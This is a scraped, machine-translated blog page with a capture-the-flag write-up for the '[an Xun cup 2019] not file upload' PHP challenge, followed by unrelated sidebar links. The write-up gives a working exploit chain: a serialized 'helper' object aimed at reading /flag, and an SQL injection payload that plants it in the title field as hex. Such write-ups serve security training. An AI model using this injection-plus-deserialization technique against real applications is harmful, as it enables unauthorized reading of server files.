当前位置:网站首页>[an Xun cup 2019] not file upload
[an Xun cup 2019] not file upload
2022-07-05 03:38:00 【paidx0】
buu Gave the source code link , Go to the source code directly
Take a brief look at , It means uploading pictures , If helper Save pictures in serialized form , So in show Can be deserialized
<?php
class helper {
protected $ifview = True;
protected $config = "/flag";
}
$a = new helper();
echo serialize($a);
//O:6:"helper":2:{s:9:"*ifview";b:1;s:9:"*config";s:5:"/flag";}
Then because the variable attribute is protected You need to add... Before the variable name \x00*\x00 Variable name ,private Is to add \x00 Class name \x00 Variable name
$attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);
$attr = unserialize($attr_temp);
So I use \0\0\0 To fill in ,show It will be replaced before deserialization
//O:6:"helper":2:{s:9:"\0\0\0ifview";b:1;s:9:"\0\0\0config";s:5:"/flag";}
SQL sentence
INSERT INTO images (implode(",",$sql_fields)) VALUES(implode(",",$sql_val))
$sql_fields[] = "`".$key_temp."`";
$sql_val[] = "'".$value_temp."'";
title,fileame,ext,path,attr
//title This is controllable , Single quote closure
//0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d
1','2','3','4',0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d)#.jpg
边栏推荐
- Multimedia query
- Unity implements the code of the attacked white flash (including shader)
- KVM virtualization
- Ask, does this ADB MySQL support sqlserver?
- Bumblebee: build, deliver, and run ebpf programs smoothly like silk
- Usage scenarios and solutions of ledger sharing
- [deep learning] deep learning reference materials
- SQL performance optimization skills
- Share the newly released web application development framework based on blazor Technology
- [luat-air105] 4.1 file system FS
猜你喜欢
![[groovy] groovy environment setup (download groovy | install groovy | configure groovy environment variables)](/img/99/bb05b6c48a9e70ca7ff77733d954b9.jpg)
[groovy] groovy environment setup (download groovy | install groovy | configure groovy environment variables)
Single box check box
Azkaban installation and deployment
![[105] Baidu brain map - Online mind mapping tool](/img/4f/64ee0bb15aec435294d4f5fde4493e.jpg)
[105] Baidu brain map - Online mind mapping tool
Talk about the SQL server version of DTM sub transaction barrier function
Multimedia query
![[groovy] string (string type variable definition | character type variable definition)](/img/d8/f02e6ad760fb039873718ff7a97b0a.jpg)
[groovy] string (string type variable definition | character type variable definition)
Share the newly released web application development framework based on blazor Technology
![[web Audit - source code disclosure] obtain source code methods and use tools](/img/ea/84e67a1fca0e12cc4452c744c242b4.png)
[web Audit - source code disclosure] obtain source code methods and use tools
[安洵杯 2019]不是文件上传
随机推荐
Basic authorization command for Curl
[vérification sur le Web - divulgation du code source] obtenir la méthode du code source et utiliser des outils
Daily question 2 12
IPv6 experiment
New interesting test applet source code_ Test available
Tencent cloud, realize image upload
Three line by line explanations of the source code of anchor free series network yolox (a total of ten articles, which are guaranteed to be explained line by line. After reading it, you can change the
[groovy] string (string injection function | asBoolean | execute | minus)
Pytest (4) - test case execution sequence
Is there any way to change the height of the uinavigationbar in the storyboard without using the UINavigationController?
Ubantu disk expansion (VMware)
Use of kubesphere configuration set (configmap)
Google Chrome CSS will not update unless the cache is cleared - Google Chrome CSS doesn't update unless clear cache
Kbp206-asemi rectifier bridge kbp206
DECLARE_ WAIT_ QUEUE_ HEAD、wake_ up_ Interruptible macro analysis
【web审计-源码泄露】获取源码方法,利用工具
Pat class a 1162 postfix expression
[wp][入门]刷弱类型题目
Multi person online anonymous chat room / private chat room source code / support the creation of multiple chat rooms at the same time
[groovy] loop control (number injection function implements loop | times function | upto function | downto function | step function | closure can be written outside as the final parameter)